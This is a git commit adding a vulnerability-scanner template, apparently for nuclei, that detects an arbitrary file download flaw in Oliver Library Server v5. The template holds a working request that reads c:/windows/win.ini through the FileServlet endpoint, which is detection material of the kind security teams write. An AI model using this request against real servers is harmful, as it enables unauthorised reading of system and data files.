Merge pull request #3367 from gy741/rule-add-v80

Create oliver-library-server-lfi.yaml
2021-12-18 14:33:23 +05:30 · 2021-12-18 14:33:23 +05:30 · 7b39972bfd
parent fc566d27a8 8afbfdc8dc
commit 7b39972bfd
1 changed files with 25 additions and 0 deletions
--- a/vulnerabilities/other/oliver-library-lfi.yaml
+++ b/vulnerabilities/other/oliver-library-lfi.yaml
@ -0,0 +1,25 @@
+id: oliver-library-lfi
+
+info:
+  name: Oliver Library Server v5 - Arbitrary File Download
+  author: gy741
+  severity: high
+  description: An arbitrary file download vulnerability in Oliver v5 Library Server Versions < 8.00.008.053 via the FileServlet function allows for arbitrary file download by an attacker using unsanitized user supplied input.
+  reference:
+    - https://www.exploit-db.com/exploits/50599
+    - https://www.softlinkint.com/product/oliver/
+  tags: windows,lfi,oliver
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/oliver/FileServlet?source=serverFile&fileName=c:/windows/win.ini"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "bit app support"
+          - "fonts"
+          - "extensions"
+        condition: and